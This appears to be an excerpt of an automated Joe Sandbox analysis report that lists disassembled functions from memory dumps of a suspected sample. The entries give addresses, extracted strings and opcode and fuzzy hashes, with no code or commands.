                                                                    • Opcode ID: ed3df3af7dc8f435a30e70e378b87b4b2f91417a05e8b0bd9acdd30b2e296d3b
                                                                    • Instruction ID: fdaa7367879707be7448ae0d08919adaa9abcef934abf08e7eed060bf9d0c7f3
                                                                    • Opcode Fuzzy Hash: ed3df3af7dc8f435a30e70e378b87b4b2f91417a05e8b0bd9acdd30b2e296d3b
                                                                    • Instruction Fuzzy Hash: 66F08C21A0D8DB8EFB34BE14A4112BD2650AF513D2F20403BCA7E86DC1CE2A7C125292
                                                                    Function 00007FF848E633D1 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction ID: cadf967c029e486b9d6c9b0734e6fc60d261c9c85d6428012597e678f49e7799
                                                                    • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction Fuzzy Hash: 0FE01A20F0D12A8FF795BA10C8503BD22A1BF85381F9450B9D86DB76E6CF387C818B49
                                                                    Function 00007FF848E63759 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction ID: 8576958cd4ac830fef12b803800038b9b0a2429590f4631019fefa52e676df46
                                                                    • Opcode Fuzzy Hash: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction Fuzzy Hash: 0BE01211E1C5554EF29DB56C44313B950C1BF98751F884179D41EF32C3DE5C3C400396
                                                                    Function 00007FF8492621F7 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 580301fb387f32a439fb4279307b0e845a8506ad573c0b3d19e194819dd02c89
                                                                    • Instruction ID: 7b00656694439cded6fd9c44f86d9ca5b6e9ef4d4fd1ed5b4b9657495932fd28
                                                                    • Opcode Fuzzy Hash: 580301fb387f32a439fb4279307b0e845a8506ad573c0b3d19e194819dd02c89
                                                                    • Instruction Fuzzy Hash: AED05B51D0D7E55FF73B297418A10741F909F2B3C1B1905B6D526DA1C3DA583D055722
                                                                    Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction ID: 22c00e277981450ec3cfd80455c7aa1b3eb6fa9d4df6ebc78a5e847680a4518f
                                                                    • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction Fuzzy Hash: D6C08C00E5F53B08E445712E14020ACA2017BC42A0FD00032C02C700929EAD30C5034E
                                                                    Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction ID: efbce210bacd50ef177f3dfb13d4aceba7f181afd6019f63510de32bdeb12342
                                                                    • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction Fuzzy Hash: 39C04C305258098FC944FB6DC98995477A0FB1D215BD60190E40DC7171E66AEC95C745
                                                                    Function 00007FF848E612E0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction ID: 66eda309ea09482d7201f089046b183db6eb6a68ed1dc125f00a417f2063d7f1
                                                                    • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction Fuzzy Hash: E0C08C309208088FC908FB28C88480433A0FB09200BC10090E008C7170E229ECD0C740
                                                                    Function 00007FF849262CDB Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ac4479dc4ecda53c7ef179598888d22d19020913b4f5b8224d51f26ee595786
                                                                    • Instruction ID: faf2a8b2c7b0cb431fb13c88a90f06b6b3d8d16cf5c4d5d76b0deaf58a1c0522
                                                                    • Opcode Fuzzy Hash: 1ac4479dc4ecda53c7ef179598888d22d19020913b4f5b8224d51f26ee595786
                                                                    • Instruction Fuzzy Hash: 61D0C910A0C5E38DF278BE01456063961A16F40382F25443EC4BFC1CC1CE2C7C017201
                                                                    Function 00007FF848E657D9 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 993a3528e8c5dabdde6f6379481d05b373b01aa1ad808d833a79762d365a6a6a
                                                                    • Instruction ID: 49a0ccb6b9210ea88df926a0a98b632c6ebc9580688ca6d1135564de5a337981
                                                                    • Opcode Fuzzy Hash: 993a3528e8c5dabdde6f6379481d05b373b01aa1ad808d833a79762d365a6a6a
                                                                    • Instruction Fuzzy Hash: 1EC08C02E0DC165AE25A6214402027E04129F80B44F844031E01EC22CACF0D2B0102CA
                                                                    Function 00007FF84926C0FF Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 69fa4278d479ece754e505f5c5d0ae7e5a2276a16017c83414430a0cc881e251
                                                                    • Instruction ID: 2a5b94458eb68a15a11c441c4e0b8155f0cf64b13da45482909736418d698bb7
                                                                    • Opcode Fuzzy Hash: 69fa4278d479ece754e505f5c5d0ae7e5a2276a16017c83414430a0cc881e251
                                                                    • Instruction Fuzzy Hash: 43C04C40E0D2929EFA31B660049607D16411B162C5B550579D22646AD3DC5C6C055225
                                                                    Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction ID: 11f8d10550346e9f3a4f007398059a370a93a6d624c90b1792530cf415cde2e8
                                                                    • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction Fuzzy Hash: E5B01200CAE41F04E408317A094206470417BC4140FC00070D40C70086D9DD3094034A
                                                                    Function 00007FF849267241 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1396a6a5799ec9228f2375124eea1be95ad0cf95695e436ed63ce9a65db8d41b
                                                                    • Instruction ID: 601f3f6fb88693863eb329da7f87d43cfc217207691c6cad23e2d861ca8c6dd1
                                                                    • Opcode Fuzzy Hash: 1396a6a5799ec9228f2375124eea1be95ad0cf95695e436ed63ce9a65db8d41b
                                                                    • Instruction Fuzzy Hash: 69B01200F0C3639FF33034B0385413C00541BC53CAF200530E22B455C7DD5C3C002291

                                                                    Executed Functions

                                                                    Function 00007FF848E80D7C Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2306690568.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff848e80000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f42eff1c7d19455174e025411fc8e141ab47032cf6d725b0cd758e592c78bd72
                                                                    • Instruction ID: db1ed0984dc85e3f1435c4c1f8a9ef3fe1b4abf088a225ddd33ed3d9e69d6a5c
                                                                    • Opcode Fuzzy Hash: f42eff1c7d19455174e025411fc8e141ab47032cf6d725b0cd758e592c78bd72
                                                                    • Instruction Fuzzy Hash: 4F91D071D1CA9D8FE789EB2888293AABFE1FB9A310F4401BAC049D72D2DF791405C710
                                                                    Function 00007FF849288828 Relevance: 5.2, Strings: 4, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ MH$x9%I$x9%I
                                                                    • API String ID: 0-1840334849
                                                                    • Opcode ID: 874f36af8bf5d592e7f2935774aaf37a7b4224b9ef7e01075e0c5a4c44f7e00c
                                                                    • Instruction ID: ad632eee1887c2b3248810949cbb1c80fb795a615d8eba717953f400c5d8a7fe
                                                                    • Opcode Fuzzy Hash: 874f36af8bf5d592e7f2935774aaf37a7b4224b9ef7e01075e0c5a4c44f7e00c
                                                                    • Instruction Fuzzy Hash: 86515930D0C59E9FEB59EFA8C8505BDB7B1FF44380F1545BAC02AE7286DA386902CB51
                                                                    Function 00007FF849289AE1 Relevance: 4.2, Strings: 3, Instructions: 403COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (MH$GzC$GzC
                                                                    • API String ID: 0-3276134968
                                                                    • Opcode ID: 45eca46f2bf616a26933b720a21fc9f17dd7bbaeee2b3b501c127b9ef2542a2b
                                                                    • Instruction ID: a434df7cee58ac654f795309c29bf1b99a44dcc3fd40aaf0be5c27fb95effb5f
                                                                    • Opcode Fuzzy Hash: 45eca46f2bf616a26933b720a21fc9f17dd7bbaeee2b3b501c127b9ef2542a2b
                                                                    • Instruction Fuzzy Hash: 66D10534A0DBA68FF378EF18D4945757BE1FF44340B25467EC4AAC3A82DB29B8428741
                                                                    Function 00007FF849287886 Relevance: 4.0, Strings: 3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC$GzC
                                                                    • API String ID: 0-1231227787
                                                                    • Opcode ID: 53121fe4eb57920fd5d81946a03a8fdf2a8565a7d5de91203f9ca6368b77edbe
                                                                    • Instruction ID: d5bfd14a30b70a9d251a1dd5497602e70d70690ae8b10b887b7018c265ef5063
                                                                    • Opcode Fuzzy Hash: 53121fe4eb57920fd5d81946a03a8fdf2a8565a7d5de91203f9ca6368b77edbe
                                                                    • Instruction Fuzzy Hash: 8881783091CA965FF778EE29944117977E9EFC5390F29067ED0AFC3182DE28B8028752
                                                                    Function 00007FF849282856 Relevance: 4.0, Strings: 3, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC$GzC
                                                                    • API String ID: 0-1231227787
                                                                    • Opcode ID: fc833ef4f224f46662c7ea7fb28bb85700805870be39da4ef1c3168adf80e66d
                                                                    • Instruction ID: fed930e6c9b9ea05c0b47c884531b6899695dae96a8fc6917c796393174d4263
                                                                    • Opcode Fuzzy Hash: fc833ef4f224f46662c7ea7fb28bb85700805870be39da4ef1c3168adf80e66d
                                                                    • Instruction Fuzzy Hash: 3081023190CA968FF778EE28945517977E1EF853D1F26067ED49FC3282DE28B8028752
                                                                    Function 00007FF84928C766 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC$GzC
                                                                    • API String ID: 0-1231227787
                                                                    • Opcode ID: 6b57485a3fcced7166a40b3d976fdac80551688cd4e786161611826e170c144a
                                                                    • Instruction ID: cd8d012566b5dc5ce90a1d39f5873b7e161c9c879f7ac58b17fd85dab50dcfad
                                                                    • Opcode Fuzzy Hash: 6b57485a3fcced7166a40b3d976fdac80551688cd4e786161611826e170c144a
                                                                    • Instruction Fuzzy Hash: 6881F53191CAA68FF779EE18944117577E1EF46390F160A7FD49EC3182DB28B40A8792
                                                                    Function 00007FF848E80B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2306690568.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff848e80000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction ID: c75d19dd1440bff90666b6e73c3834fbe9e2ef524e49a33454ae36c10d1c5faa
                                                                    • Opcode Fuzzy Hash: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction Fuzzy Hash: 4F01A22671E95E8FC7426A3DB8904E8BB50EA87136B9903FBD444C7192E611585EC790
                                                                    Function 00007FF849284AB1 Relevance: 2.9, Strings: 2, Instructions: 407COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: 578293ffb5c0ce5212c083a8bec1b9250904424ed7f918ba766139afd65105c8
                                                                    • Instruction ID: 59a9b1fd54cf6cf99f5bddec598c59f45a8bde6d2ea9c8153d86815434110955
                                                                    • Opcode Fuzzy Hash: 578293ffb5c0ce5212c083a8bec1b9250904424ed7f918ba766139afd65105c8
                                                                    • Instruction Fuzzy Hash: 04D1C230A0DF968FF378EF28D494575B7E1FF44344B25467EC4AAC7A82DA29B8428741
                                                                    Function 00007FF84929B85E Relevance: 2.8, Strings: 2, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: 3d319c858af3d06e36be77694febc9d0422d054949e18cab56a9d2d5d1c2fba5
                                                                    • Instruction ID: 4ee64951c5f564156d9a15664e4a378d82e973e060823ae895ede71934b6adff
                                                                    • Opcode Fuzzy Hash: 3d319c858af3d06e36be77694febc9d0422d054949e18cab56a9d2d5d1c2fba5
                                                                    • Instruction Fuzzy Hash: 9DA1A130A1CA8D8FEBA8EF28D8557F937D1FB58350F14422EE85DC7291CB3499458B82
                                                                    Function 00007FF84928337A Relevance: 2.8, Strings: 2, Instructions: 297COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: b5699c21159aa5a487d6367da5e61ebaf70fd15f10ac39812a6f5de6c0024ffb
                                                                    • Instruction ID: c6f0842ab0929d8a0958cdbb934ecd071035a185f6f0b658e000e5b00be88e67
                                                                    • Opcode Fuzzy Hash: b5699c21159aa5a487d6367da5e61ebaf70fd15f10ac39812a6f5de6c0024ffb
                                                                    • Instruction Fuzzy Hash: C6B1F37091CA968FE759EF28C0906B5B7E1FF09340F5552B9C05EC7A86CB28F851C791
                                                                    Function 00007FF849285A12 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @%%I$GzC
                                                                    • API String ID: 0-3686185777
                                                                    • Opcode ID: 253f48eee43be701c709378acddafc023d81279a3ad7234818bc8e8a1cbf1bd4
                                                                    • Instruction ID: d7597e71b5bb5260f0489a5b463f795138aad2621a6c329440a9b234d0a0b0a5
                                                                    • Opcode Fuzzy Hash: 253f48eee43be701c709378acddafc023d81279a3ad7234818bc8e8a1cbf1bd4
                                                                    • Instruction Fuzzy Hash: 5151077190C89B4FF778FE1888969B937C5FF64361B1603F9D0AEC3596DE18A8068741
                                                                    Function 00007FF8492884AE Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: 0694fb976c1ebaa439470b1418e33d5a2c92eb69b7990a0fcaaeb18dc97860be
                                                                    • Instruction ID: 027d832c710c4cd96c719b8dfc6daf285d0f760a58435d64258fa3ead5f7959a
                                                                    • Opcode Fuzzy Hash: 0694fb976c1ebaa439470b1418e33d5a2c92eb69b7990a0fcaaeb18dc97860be
                                                                    • Instruction Fuzzy Hash: 2E71387090CA968FE759EF28D4905B4BBB0FF05380F5542BAD46EC7A87CB28B851C791
                                                                    Function 00007FF849288E30 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0?%I$P?%I
                                                                    • API String ID: 0-378524970
                                                                    • Opcode ID: c24fbf6990e4220caee40605def83cd8899cbaf162ce47771d7e800dee93da06
                                                                    • Instruction ID: defe28e858cb9da4ba85582fb77c976cc86f053ab5210a04a7599e8124c29296
                                                                    • Opcode Fuzzy Hash: c24fbf6990e4220caee40605def83cd8899cbaf162ce47771d7e800dee93da06
                                                                    • Instruction Fuzzy Hash: 1D51F830D1C9AA8FFBB8EA1848607F577A1FF55380F4542F9D06EC7586DE3869848741
                                                                    Function 00007FF84928D708 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $(fH
                                                                    • API String ID: 0-861492242
                                                                    • Opcode ID: 5a9b88d024eafe357eb0debf95c8f66d038a9a9b53834a78affc8d5773b1adc7
                                                                    • Instruction ID: 2b44aaf33373dfe2c708e6a251f208ec57c62226d98adb421d5bfd40b6ca06cb
                                                                    • Opcode Fuzzy Hash: 5a9b88d024eafe357eb0debf95c8f66d038a9a9b53834a78affc8d5773b1adc7
                                                                    • Instruction Fuzzy Hash: 8D515E71D0C59E9FEB59EFA8D4546BDB7B1FF44340F1541BAC01AE7282CA386906CB50
                                                                    Function 00007FF84929194E Relevance: 1.9, Strings: 1, Instructions: 675COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC
                                                                    • API String ID: 0-3146348960
                                                                    • Opcode ID: dcb92be0db749aaf2313eaeedda9bf50d03f80236f50c2d8d001b73285182f72
                                                                    • Instruction ID: 7b429d586d2ff867860f1155e4449d1b402db6534ef9943b2bd188aeb27c41ee
                                                                    • Opcode Fuzzy Hash: dcb92be0db749aaf2313eaeedda9bf50d03f80236f50c2d8d001b73285182f72
                                                                    • Instruction Fuzzy Hash: E922A430B1CA598FEBA8EF09C895E7873E2FF58355B1041B9D05ED7292DA24AC45CB81
                                                                    Function 00007FF8492867C0 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC
                                                                    • API String ID: 0-3146348960
                                                                    • Opcode ID: 3f87b92feee1be4537e5673981edf305bd4da5314f718fcf627ebe419cffeb23
                                                                    • Instruction ID: be3ea5ff1ac73d0361929297d15b439f313b76e2dcc5a019fb9a7d1f0ef8832f
                                                                    • Opcode Fuzzy Hash: 3f87b92feee1be4537e5673981edf305bd4da5314f718fcf627ebe419cffeb23
                                                                    • Instruction Fuzzy Hash: 6B918230618A5D8FEB58EF18C885AB9B3F2FF59314B1546A9D05EC7262DA35FC42CB40
                                                                    Function 00007FF8492809B9 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC
                                                                    • API String ID: 0-3146348960
                                                                    • Opcode ID: ce43e491dd40e35193ab4cdd0c078b214ec3df4aba9d0d722e93bd656ee3d1e0
                                                                    • Instruction ID: 7619a8b409ff83619b4f6a04567157cd312aadfb89c865b981d7203aaf0bd59c
                                                                    • Opcode Fuzzy Hash: ce43e491dd40e35193ab4cdd0c078b214ec3df4aba9d0d722e93bd656ee3d1e0
                                                                    • Instruction Fuzzy Hash: C771293198C5995FF778FE1888565F937C0FF48350B1603B9D5BEC35A2DE18A8068791
                                                                    Function 00007FF84928A8A9 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC
                                                                    • API String ID: 0-3146348960
                                                                    • Opcode ID: 25e575153c774b97e09355c2e1223456ff501ee7d4ac11a60d7fb6d61327635d
                                                                    • Instruction ID: 1a23422b11331f323fa7f49421f4f0c7286b877aae8d5635686fd9e086a584ee
